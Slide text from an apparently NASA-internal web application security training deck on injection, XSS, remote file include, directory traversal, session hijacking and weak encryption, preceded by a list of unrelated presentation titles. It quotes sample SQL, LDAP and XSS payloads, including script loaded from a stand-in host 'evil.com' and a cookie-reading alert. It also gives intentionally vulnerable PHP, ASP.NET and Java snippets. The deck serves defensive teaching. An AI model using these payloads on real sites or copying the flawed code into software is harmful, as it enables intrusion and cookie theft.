Linux Support for SMARC: How Toradex Empowers Embedded DevelopersLinux Support for SMARC: How Toradex Empowers Embedded Developers
Linux Support for SMARC: How Toradex Empowers Embedded Developers
Toradex
 
Heap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and DeletionHeap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and Deletion
Jaydeep Kale
 
AI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global TrendsAI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global Trends
InData Labs
 
Semantic Cultivators : The Critical Future Role to Enable AI
Semantic Cultivators : The Critical Future Role to Enable AISemantic Cultivators : The Critical Future Role to Enable AI
Semantic Cultivators : The Critical Future Role to Enable AI
artmondano
 
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
SOFTTECHHUB
 
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
Alan Dix
 
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul
 
Role of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered ManufacturingRole of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered Manufacturing
Andrew Leo
 
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdfComplete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Software Company
 
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptxSpecial Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
shyamraj55
 
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
BookNet Canada
 
Electronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploitElectronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploit
niftliyevhuseyn
 
What is Model Context Protocol(MCP) - The new technology for communication bw...
What is Model Context Protocol(MCP) - The new technology for communication bw...What is Model Context Protocol(MCP) - The new technology for communication bw...
What is Model Context Protocol(MCP) - The new technology for communication bw...
Vishnu Singh Chundawat
 
Drupalcamp Finland – Measuring Front-end Energy Consumption
Drupalcamp Finland – Measuring Front-end Energy ConsumptionDrupalcamp Finland – Measuring Front-end Energy Consumption
Drupalcamp Finland – Measuring Front-end Energy Consumption
Exove
 
How Can I use the AI Hype in my Business Context?
How Can I use the AI Hype in my Business Context?How Can I use the AI Hype in my Business Context?
How Can I use the AI Hype in my Business Context?
Daniel Lehner
 
Cyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of securityCyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of security
riccardosl1
 
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager APIUiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPathCommunity
 
Cybersecurity Identity and Access Solutions using Azure AD
Cybersecurity Identity and Access Solutions using Azure ADCybersecurity Identity and Access Solutions using Azure AD
Cybersecurity Identity and Access Solutions using Azure AD
VICTOR MAESTRE RAMIREZ
 
HCL Nomad Web – Best Practices and Managing Multiuser Environments
HCL Nomad Web – Best Practices and Managing Multiuser EnvironmentsHCL Nomad Web – Best Practices and Managing Multiuser Environments
HCL Nomad Web – Best Practices and Managing Multiuser Environments
panagenda
 
Ad

Application and Website Security -- Fundamental Edition

  • 1. Application and Website Security – Fundamental Edition Daniel Owens IT Security Professional
  • 2. Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
  • 3. Purpose Drum up interest Session Prerequisites None
  • 4. Communication Media and Security Concerns Communication media: „Wired‟ networks „Wireless‟ networks Security concerns: The Insider The Outsider The Technology Nature
  • 5. A Note About Security Security helps functionality – if it doesn’t help functionality, it isn’t security. -Daniel Owens
  • 6. Consequences of Poor Security Stolen intellectual property System downtime Lost productivity Damage to NASA‟s reputation Lost public confidence Lost revenue Congressional inquiries
  • 7. Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
  • 8. SQL | LDAP Injection SQL and LDAP Injection The injection of malicious code intended to bypass filtering and execute a query of the attacker‟s choosing Can be thwarted using strongly typed variables, parameterized statements, escaping, and whitelists Example Strings include: 1‟1 %31%27%20%4F%52%20%27%31%27%3D%27%31 &#49&#39&#32&#79&#82&#32&#39&#49&#39&#61& #39&#49 *(|(mail=*))
  • 9. Java SQL Injection static void main(String[] args){ Connection conn=null; String username=args[0]; String password=args[1]; String query=“SELECT uid, pass FROM users WHERE uid LIKE “+username+”%”; conn=DriverManager.getConnection(“jdbc:odbc:l ogistics”,”admin”,”LetMeIn”); Statement stmnt=conn.createStatement(); ResultSet rs=stmnt.executeQuery(query); … }
  • 10. Demonstration 1 SQL Injection Bypassing Security Checks
  • 11. Case Study 1 SQL Injection Owning Networks
  • 12. Cross-Site Scripting (XSS) XSS The injection of client-side code Comes in three kinds: Persistent Non-Persistent DOM Only occurs when user input influences the output Can be stopped by assuming all input is malicious until proven otherwise through a whitelist Can lead to a complete system compromise – for
  • 13. Cross-Site Scripting (cont.) XSS (cont.) Sample strings: <script src=http://evil.com/attack.js << </script << <link rel=“stylesheet” href=http://evil.com/attack.css> %3Cscript%3Epref%3Dfunction(a%2Cb) {document.write(a%2B%22%20- %3E%20%22%2Bb%2B%22%3Cbr%20%2F%3E%22) %3B} %3B%3C%2Fscript%3E%3Cscript%20src%3D%22vie w- source%3Aresource%3A%2F%2F%2Fgreprefs%2Fall. js%22%3E%3C%2Fscript%3E <img src=”” onMouseOver=”alert(document.cookie)”; />
  • 14. ASP.NET Cross-Site Scripting <%@ Page Language="C#" ValidateRequest="false" %> <html> <script runat="server"> void btnSubmit_Click(Object sender, EventArgs e) { Response.Write(txtString.Text); } </script> // CONTINUED ON NEXT SLIDE
  • 15. ASP.NET Cross-Site Scripting (cont.) // CONTINUED FROM PREVIOUS SLIDE <body> <form id="form1" runat="server"> <asp:TextBox id="txtString" runat="server" Text="<script>alert(„hi‟);</script>" /> <asp:Button id="btnSubmit" runat="server" OnClick="btnSubmit_Click" Text="Submit" /> </form> </body> </html>
  • 16. Demonstration 2 XSS Having Fun
  • 17. Remote File Include/Execution | Code Injection Remote File Include and Execution An attacker tricks the system into including and/or executing arbitrary files Code Injection Attacker tricks the system into executing arbitrary code by injecting the commands into the code Both Code of the attacker‟s choosing is executed Contrary to popular belief, ANY language can suffer this
  • 18. PHP Remote File Include <?php …. require_once($_GET[„config‟]); require_once($_GET[„base‟].”/index.php”); …. ?>
  • 19. ASP.NET Remote File Include <% …. set url = Request.QueryString; set xml =Server.CreateObject(“Microsoft.XMLHTTP”); xml.open “GET”, url, false xml.send “” Response.write xml.responseText set xml = nothing …. %>
  • 20. Hidden Elements | Cookies Hidden Elements and Cookies Hidden fields and cookies were merely intended to provide data storage without cluttering up the user‟s view They do not provide secure storage They are not immutable storage locations Neither should contain sensitive information Both should be considered malicious until proven otherwise Any data in it should not be directly used for output Whitelisting should be used to prove innocence
  • 21. Hidden Elements | Cookies (cont.) Hidden Elements and Cookies (cont.) &#65533; -575840793 ReferrerUrlQhttps://XXX.XXX.nasa.gov/CMTOOLS/Log in.aspx?ReturnUrl=/CMTOOLS/ErrorPage.aspxTextErr orddOnClickreturnconfirm ... „USERNAME (RandomData)'); return false;ddhSetTargetText('ctl00_SimpleSearchForm_Use r2_InputFieldTextbox', „USERNAME (<a href=pizza.gov>pizza is good for you</a>USERACCOUNT)'); return; fd- ctl00$SimpleSearchForm$User1$UserListGridView<+ &#65533; fd
  • 22. Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
  • 23. Session Hijacking – Cookie Theft Cookie Theft The theft of a client‟s cookies by an attacker Often possible because of other vulnerabilities – browser flaws (sandboxing), having TRACE enabled, XSS, etc Can be hampered if mechanisms such as NONCEs are used NONCEs should be a set of characteristics unique to the specific session – client IP, server IP, server port, user agent string, and other key information Additional mechanisms include using secure cookies, but this has limited impact
  • 24. Session Hijacking – Session Fixation Session Fixation An attacker uses a „known‟ session ID Often, the attacker opens the session and keeps it open while attempting to convince a victim to login using the known session This is often a phishing or other social engineering attack Can be hampered if session IDs are „rekeyed‟ on login AND sessions expire and are removed quickly Difficult to stop if sessions are guessable
  • 26. Directory Traversal Directory Traversal An attacker is able to trick the system into traversing the directory structure In many instances, arbitrary files can be viewed Attackers are often attempting to execute a file or gather information If user input dictates the output, care must be taken to ensure the input is „valid‟ Whitelists become invaluable In extreme cases, an attacker can actually use this to gain administrator access to the server
  • 27. PHP Directory Traversal <?php …. $date=$_GET[„date‟]; if($handle=fopen(“calendar/$date”,”rb”)){ print(fread($handle,filesize(“calendar/$date”))); fclose($handle); } …. ?>
  • 28. Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
  • 29. Session Hijacking – Spoofing Spoofing Pretending to be someone else, an attacker attempts to gain the victim‟s privileges Comes in three basic forms Blind (write-only) Half pipe (read-only) Full pipe Network configuration and other protection mechanisms can make this difficult to defeat (both for the attacker and for the developer)
  • 31. Case Study 2 Session Hijacking Spoofing
  • 32. Weak Encryption | Using Encoding Weak/Home-Grown Encryption The use of weak and home grown encryption has led to the compromise of many systems It is also what makes session hijacking via spoofing, and man-in-the-middle with bucket brigade and substitution attacks so trivial Encoding The use of algorithms that take output and simply change the format (normally it is the number of bits used per character) This is not secure by any means
  • 33. Case Study 3 Weak Encryption | Encoding XOR SHA Base64
  • 34. Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion and Appendices
  • 35. Security Compass XSS-Me A free Firefox plug-in Performs semi-automated XSS attacks against POST fields SQL Inject-Me A free Firefox plug-in Performs semi-automated SQL injection attacks against POST fields Access-Me A free Firefox plug-in…
  • 36. Other Firefox Add-ons Web Developer Add-on Free Let‟s you view source files cleanly and easily Let‟s you quickly enable and disable things (like cookies, JavaScript, and Meta Refresh) Let‟s you view and modify form fields and cookie data Tamper Data Free Let‟s you modify most request data
  • 37. Fuzzers BED.pl Free Perl script Performs basic tests of your SERVER JBroFuzz Free Java application Let‟s you fuzz any part of an HTTP/HTTPS request in a semi-automated fashion Powerfuzzer Free and commercial versions (Python script) Easy and multi-talented… automated
  • 38. Other Tools Sothink SWF Decompiler Decompiles any Adobe Flash or Flux script Cavaj Free Decompiles any Java program Nikto Free Provides scans of the website looking for common, basic vulnerabilities and misconfigurations
  • 39. Agenda Course Introduction Common Input Validation Flaws Common Access Control Flaws Common Encryption Flaws Tools Conclusion And Appendices
  • 40. For More Information Microsoft Security Site (all audiences) http://www.microsoft.com/security MSDN Security Site (developers) http://msdn.microsoft.com/security TechNet Security Site (IT professionals) http://www.microsoft.com/technet/security SANS Top-20 (IT Professionals) http://www.sans.org/top20/
  • 41. For More Information (cont.) Common Weakness Enumeration (CWE)/SANS Top 25 Most Dangerous Programming Errors (developers) http://cwe.mitre.org/top25/index.html GRC IT Security Office http://itsecurity.grc.nasa.gov Most Common Software Errors http://discussweb.com/software-testing/803-most- common-software-errors.html
  • 42. Acknowledgements I stole the background from Microsoft I stole a lot from my experiences and previous writings

Editor's Notes

  • #10: The above code illustrates a SQL injection vulnerability
  • #15: The code here is vulnerable to XSS
  • #19: The code here is vulnerable to remote include in two locations
  • #20: The code here is vulnerable to a remote include
  • #28: The code here is vulnerable to directory traversal